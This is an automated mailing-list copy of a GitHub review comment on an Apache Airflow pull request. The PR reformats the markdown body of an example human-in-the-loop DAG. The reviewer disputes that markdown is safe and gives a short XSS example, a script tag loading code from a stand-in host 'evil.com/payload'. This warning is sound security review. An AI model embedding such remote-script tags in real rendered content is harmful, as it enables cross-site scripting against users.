ashb commented on code in PR #54166:
URL: https://github.com/apache/airflow/pull/54166#discussion_r2262275100
##########
providers/standard/src/airflow/providers/standard/example_dags/example_hitl_operator.py:
##########
@@ -125,10 +125,11 @@ def notify(self, context: Context) -> None:
task_id="valid_input_and_options",
subject="Are the following input and options valid?",
body="""
- Input: {{
ti.xcom_pull(task_ids='wait_for_input')["params_input"]["information"] }}
- Option: {{ ti.xcom_pull(task_ids='wait_for_option')["chosen_options"]
}}
- Multiple Options: {{
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
- Timeout Option: {{
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+**Collected Information**
+- Input: {{
ti.xcom_pull(task_ids='wait_for_input')["params_input"]["information"] }}
+- Option: {{ ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+- Multiple Options: {{
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+- Timeout Option: {{
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
Review Comment:
> Markdown is "safe" in the way that it only allows formatting and NOT
embedding JS code
That isn't true at all. This is valid markdown:
```markdown
## Hi XSS
<script src="evil.com/payload"><script>
```
and will result in an HTML script tag.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]
